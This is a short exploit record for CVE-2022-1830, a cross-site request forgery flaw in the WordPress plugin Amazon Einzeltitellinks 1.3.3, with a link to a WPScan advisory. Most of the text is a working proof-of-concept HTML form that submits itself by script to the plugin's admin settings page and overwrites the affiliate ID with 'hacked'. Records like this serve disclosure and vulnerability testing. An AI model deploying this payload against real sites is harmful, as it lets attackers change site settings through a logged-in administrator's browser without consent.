CVE: CVE-2022-1830

Name: Amazon Einzeltitellinks (amazon-einzeltitellinks)

Version: 1.3.3

Date: 2022-04-22 20:05:16

Advisory: https://wpscan.com/vulnerability/a6b3e927-41e2-4e48-b9e1-8c58a1b9a933

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=amazon-einzeltitellinks.php" method="POST">
    <input type="text" name="BenutzerID" value="hacked">
    <input type="text" name="amazon_einzeltitel_links_name" value="">
    <input type="text" name="amazon_einzeltitel_rechts_name" value="">
    <input type="text" name="amazon_einzeltitel_none_name" value="">
    <input type="text" name="amazon_einzeltitel_link_name" value="">
    <input type="text" name="amazon_einzeltitel_rahmen_name" value="">
    <input type="text" name="amazon_einzeltitel_titelfarbe_name" value="">
    <input type="text" name="amazon_einzeltitel_preisfarbe_name" value="">
    <input type="text" name="amazon_einzeltitel_hintergrundfarbe_name" value="">
    <input type="text" name="amazonUpdate" value="Speichern">
</form>
<script>
    document.forms[0].submit();
</script>